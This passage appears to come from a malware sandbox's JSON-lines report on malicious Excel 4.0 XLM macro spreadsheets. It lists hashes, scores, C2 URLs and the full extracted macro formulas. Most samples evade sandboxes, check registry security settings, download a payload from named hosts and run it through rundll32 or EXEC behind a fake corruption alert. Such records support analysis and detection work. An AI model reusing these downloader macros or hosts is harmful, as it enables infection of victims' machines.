255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3EYNPIJbyP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79e65d7243395e597d0613ef992181a85d4b5560c3e4d3fee3d220c177f482d7"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79e65d7243395e597d0613ef992181a85d4b5560c3e4d3fee3d220c177f482d7","filesize":221184,"md5":"ad6fb33630b0a81164ed27f74d798bfe","sha1":"cae35ec36935f24469d6d9f0cab176270e74d786","sha256":"79e65d7243395e597d0613ef992181a85d4b5560c3e4d3fee3d220c177f482d7","sha512":"a28fd7d3c6207e75786d567bef22d0399eae6718b739176482a87639c55266559f27ddabd9eb9ddfbf3f8a99e00d06e72b3b638787f259395190a95515178609","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79e65d7243395e597d0613ef992181a85d4b5560c3e4d3fee3d220c177f482d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dELqWLerXZ\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a00d76a4c85f07a922b2393bf48f03c928a1f11e5442a1427d143332e233bbb"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a00d76a4c85f07a922b2393bf48f03c928a1f11e5442a1427d143332e233bbb","filesize":214016,"md5":"c0c7e66f92bc53dd34ea0239cda979d1","sha1":"16bdbd5f5e3d15d04de47170145478e012baa564","sha256":"7a00d76a4c85f07a922b2393bf48f03c928a1f11e5442a1427d143332e233bbb","sha512":"fc59b7e61830b7e273276d5a46a6b599d5bfba999194bff4129563984876fbb9e4e81b2d2bfcac2412d5f1d61cdec8d227b7f4567c1f598fa98f1de3eb74a39a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a00d76a4c85f07a922b2393bf48f03c928a1f11e5442a1427d143332e233bbb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ozTYspEVGV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a0313ed8a18c77ddfeb1668424f51a2f884560533d690455ef8caec0493357c"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a0313ed8a18c77ddfeb1668424f51a2f884560533d690455ef8caec0493357c","filesize":196096,"md5":"66b3d9a3a757dc271c141b50d186031c","sha1":"75d63642fbbecdf6f50acb561049b6f606899114","sha256":"7a0313ed8a18c77ddfeb1668424f51a2f884560533d690455ef8caec0493357c","sha512":"2bbac9d27964776a5ff453d22c4b143825a24b35bfe87b8af8de48d6a8b9150bd1b606608d46764ace70d04b0477a56f48b258721e44a8a1650bc8d5745e2154","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a0313ed8a18c77ddfeb1668424f51a2f884560533d690455ef8caec0493357c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nFOPEN(\"C:\\Users\\Public\\2.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(GET.WORKSPACE(42),EXEC(GET.NOTE(R$34C$3)),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a046c775a10f4f237547affdd11f5a78072bf8beb623009dc80276a9673f763"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a046c775a10f4f237547affdd11f5a78072bf8beb623009dc80276a9673f763","filesize":206336,"md5":"517f37a5746aedc915d736f0ee505ee8","sha1":"b80d4fbe7fae175bb2ada13b568d03129260f37e","sha256":"7a046c775a10f4f237547affdd11f5a78072bf8beb623009dc80276a9673f763","sha512":"df5ca968555bb2d5cb7eaa657d055b9a1fbf4ad0641a6aac8c978128d1bb0faeaee685d020ff9eb536a7bc375844bdb63ab5d5683a9da3a6fb0c9b93e0ee2d04","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a046c775a10f4f237547affdd11f5a78072bf8beb623009dc80276a9673f763.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sVva7TGNGG\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a22dbbc280c03ab3d2b2fd2ada52356f1a0e9f5910dd93342dd07c4905d0fc8"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a22dbbc280c03ab3d2b2fd2ada52356f1a0e9f5910dd93342dd07c4905d0fc8","filesize":141824,"md5":"de476fbecec45ef64faba61b1f5a22df","sha1":"09d6916111ff5562691c776debcd7e40dbd5b7d0","sha256":"7a22dbbc280c03ab3d2b2fd2ada52356f1a0e9f5910dd93342dd07c4905d0fc8","sha512":"374cd5698f1441ec77ab6fa499ccdfdf235f7385ab70dab7f804c5d1d064516c6f51330563c9c0a46f2d117d38e9147a1caf577d1041b86e13ba7aac06fc96fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a22dbbc280c03ab3d2b2fd2ada52356f1a0e9f5910dd93342dd07c4905d0fc8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"fAv5WHWiW9\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a2ebe57dbaa19bbb38f3576f553c38273f78aaae3b89e820a1ab5085941691c"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a2ebe57dbaa19bbb38f3576f553c38273f78aaae3b89e820a1ab5085941691c","filesize":168448,"md5":"530aab28461075b6d71ff7d6c4ddf8f3","sha1":"ab58d087d61be0475a83a7d53bff247ce2692048","sha256":"7a2ebe57dbaa19bbb38f3576f553c38273f78aaae3b89e820a1ab5085941691c","sha512":"5082d5f33c4184ba027f3b06ce3eb1031348b501723cd78fc12223cbc9987bde5128aa4a43d02737eaeab5dbef082ef6d2352abec3046eb7dd25f87c4aa61f1d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a2ebe57dbaa19bbb38f3576f553c38273f78aaae3b89e820a1ab5085941691c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WWsQgHcLBZ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a312d28237f93151a3dfa5af2ccfd7deb93a47b876a8bb9bb4009fd5608a7c3"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a312d28237f93151a3dfa5af2ccfd7deb93a47b876a8bb9bb4009fd5608a7c3","filesize":112640,"md5":"dfae8cb4bdccf07504d94f64a32834bc","sha1":"c66bb4c3c3a8fa999f77f2bba3542d10eb374665","sha256":"7a312d28237f93151a3dfa5af2ccfd7deb93a47b876a8bb9bb4009fd5608a7c3","sha512":"8889ec2a78c75fe696c81e9438f282466f0f2f2e6981bf935a21806d8ee57f23896a900f43f881a7bcb89cb2fb1b0edfaa451ea87f2aaec16b2972fbd60ee797","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a312d28237f93151a3dfa5af2ccfd7deb93a47b876a8bb9bb4009fd5608a7c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a31484e741d3343fe624efbb35718c38df0cf1aed9faeb08d0ae87cc1cc998f"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a31484e741d3343fe624efbb35718c38df0cf1aed9faeb08d0ae87cc1cc998f","filesize":160768,"md5":"fe68e0a22081fabbe3df334d2c7f0dfd","sha1":"41a54aa4965e7a638034db6c478ef3566d6e241c","sha256":"7a31484e741d3343fe624efbb35718c38df0cf1aed9faeb08d0ae87cc1cc998f","sha512":"849908ffa83c67a553692aab4b5bfcbb3274d5daacd2c6d1ab175fa4673bc0098a19be088f301a14681c16606d2b050a61f414ef4113384baceacb405f7396d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a31484e741d3343fe624efbb35718c38df0cf1aed9faeb08d0ae87cc1cc998f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MrlBCYXFhP\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a38606e6c2536707e73315fe2393e17f94c567ce4f36170b7c07b98d332ca24"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a38606e6c2536707e73315fe2393e17f94c567ce4f36170b7c07b98d332ca24","filesize":167936,"md5":"348a2666778e896e58bae955b1d7166c","sha1":"2b89d6a2378de0a1f472ad0a7624503df0609843","sha256":"7a38606e6c2536707e73315fe2393e17f94c567ce4f36170b7c07b98d332ca24","sha512":"00726986236c1eccd5f3bac4c728abbae32d75c42165d026e26ced95269eab17f61d34892b32a904c5f81a0fa3e2f79b199ea8750f9188f471f00dfde80ac282","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a38606e6c2536707e73315fe2393e17f94c567ce4f36170b7c07b98d332ca24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"utgNV07gPK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a45ae5af7c5ce0bc7819e93e26426c1f704fe5708c994f8fe8b476f500773f0"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a45ae5af7c5ce0bc7819e93e26426c1f704fe5708c994f8fe8b476f500773f0","filesize":185344,"md5":"7fccf88ebe0e7184b58d78ddc9aed5e8","sha1":"208b450e28ce0aaeec020a3d941af3a6b8895572","sha256":"7a45ae5af7c5ce0bc7819e93e26426c1f704fe5708c994f8fe8b476f500773f0","sha512":"dde40cdf874f4ab59bc712cc87fd5942e72d040cc0ac9d765f71b58f0ddb631147c20ef8a65ed945503ec9ebfa1be69ae8a3b19189bd5abc7c0a5cd939fd885e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a45ae5af7c5ce0bc7819e93e26426c1f704fe5708c994f8fe8b476f500773f0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a46fd6ed7bcdeb383de624d67f1acca99b22013455d418cfee49c94c68fda55"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a46fd6ed7bcdeb383de624d67f1acca99b22013455d418cfee49c94c68fda55","filesize":185344,"md5":"f4204316dde9b125e26591d13fdec129","sha1":"dfa98166f5c7b9eb2f5922167200274c22bdd4cc","sha256":"7a46fd6ed7bcdeb383de624d67f1acca99b22013455d418cfee49c94c68fda55","sha512":"c027cecc9b9cd8ccf062e5b4a11b68d3e1c820d64d1e4d0992a02ce57c29581fccd7e2236bf1e7eaa0c1f0839270f94060331aefbcce22f52b1f721e5eb2a5b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a46fd6ed7bcdeb383de624d67f1acca99b22013455d418cfee49c94c68fda55.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a55e9e92652571291d0b7da325ad8d7dc1619dc17b285ba6320e3d939a08310"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7a55e9e92652571291d0b7da325ad8d7dc1619dc17b285ba6320e3d939a08310","filesize":167936,"md5":"d37ce7939487968c6a113f6916f95d51","sha1":"efc11fea33cf0647b90e63ccc8047c2e464cf57b","sha256":"7a55e9e92652571291d0b7da325ad8d7dc1619dc17b285ba6320e3d939a08310","sha512":"e7837308c5535cabe0bfaf34552bc2f08bcfe43e3d7c91bab5f1ddda9311051a0da5ebb8d5143916c1bb30230c7ce1e7db7f679efd4aaa7b6dc0b2973ee5ac81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a55e9e92652571291d0b7da325ad8d7dc1619dc17b285ba6320e3d939a08310.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gZFq4spY0C\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a5bb53127d7b4ef67e2f80e604113d2330a9b4c3dd2834a2c2d4474bb8c2637"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7a5bb53127d7b4ef67e2f80e604113d2330a9b4c3dd2834a2c2d4474bb8c2637","filesize":138240,"md5":"88b75c8cdee747f860fe9992f882a423","sha1":"86b72339c088bec3f069e85092062eb8bf16d191","sha256":"7a5bb53127d7b4ef67e2f80e604113d2330a9b4c3dd2834a2c2d4474bb8c2637","sha512":"902add37780e91fd414e8c1a3fc31a78910d79f6d87c496486ffbd6b229fd167c5c8bce3d6f821bda226069a3484c65d60462f6c6a655322fee6d036fe6be22a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a5bb53127d7b4ef67e2f80e604113d2330a9b4c3dd2834a2c2d4474bb8c2637.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://gengrasjeepram.com/sv.exe"],"attr":{"formulas":"CALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://gengrasjeepram.com/sv.exe\",\"gift.exe\",0,0)\nEXEC(\"gift.exe\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a5ec9e99310f4c69fe7ddbcc714b474fb6aade81775007e9b4099b00c3d69ae"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7a5ec9e99310f4c69fe7ddbcc714b474fb6aade81775007e9b4099b00c3d69ae","filesize":145920,"md5":"e9b5061056817f3aeb34961a534238ba","sha1":"8ff8ca12d12634c453a7f88a19d55af472185c72","sha256":"7a5ec9e99310f4c69fe7ddbcc714b474fb6aade81775007e9b4099b00c3d69ae","sha512":"3b0692874ca58c6fd38ab40c994fdd98114911f23377ba856e763bb76e85204267a33b306448a7b4901a35039f2f736ee3a09f9fe1a1d13ddd17912e5afb862d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a5ec9e99310f4c69fe7ddbcc714b474fb6aade81775007e9b4099b00c3d69ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"amMzxuvmnt\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a6caab939ee30ffda56ef82cf10b9cf2f9c92dcc99f83a20b5b5503b7d52fd4"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7a6caab939ee30ffda56ef82cf10b9cf2f9c92dcc99f83a20b5b5503b7d52fd4","filesize":138240,"md5":"4c103e67cb9792cd5f41694bfcedd61c","sha1":"826122f241fb051f7d90897c0497f5b1ab0c204b","sha256":"7a6caab939ee30ffda56ef82cf10b9cf2f9c92dcc99f83a20b5b5503b7d52fd4","sha512":"5bb8f8fbeef23ce1a89131857383e7d77c118e335255ff3de6cfdf47de0cdc5c4221b38aa827c3c14ef2d85e40b5e70b984e1dc1a4b905be548389051d42aae3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a6caab939ee30ffda56ef82cf10b9cf2f9c92dcc99f83a20b5b5503b7d52fd4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://gengrasjeepram.com/sv.exe"],"attr":{"formulas":"CALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://gengrasjeepram.com/sv.exe\",\"gift.exe\",0,0)\nEXEC(\"gift.exe\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7a8635b596b22c4b0946d43e12ea1fba0f2b14bdbc301d89c4bdd7c753b6e01a"},"analysis":{"reported":"2020-04-09T16:17:13Z","score":10},"files":[{"filename":"7a8635b596b22c4b0946d43e12ea1fba0f2b14bdbc301d89c4bdd7c753b6e01a","filesize":56832,"md5":"be8f7790b5c1734164237771d78bfb93","sha1":"ddaa1f2a6922a3236df717f813e7da5b86c30bf0","sha256":"7a8635b596b22c4b0946d43e12ea1fba0f2b14bdbc301d89c4bdd7c753b6e01a","sha512":"d46e964773d819d3285e198a66c1b5290e403406b0e194d95dad7f6e4b78e3a0e237bb4c46825f4b816bf5aeb194cb254ad606afa259bbe687a4391b9d3bc2bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7a8635b596b22c4b0946d43e12ea1fba0f2b14bdbc301d89c4bdd7c753b6e01a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 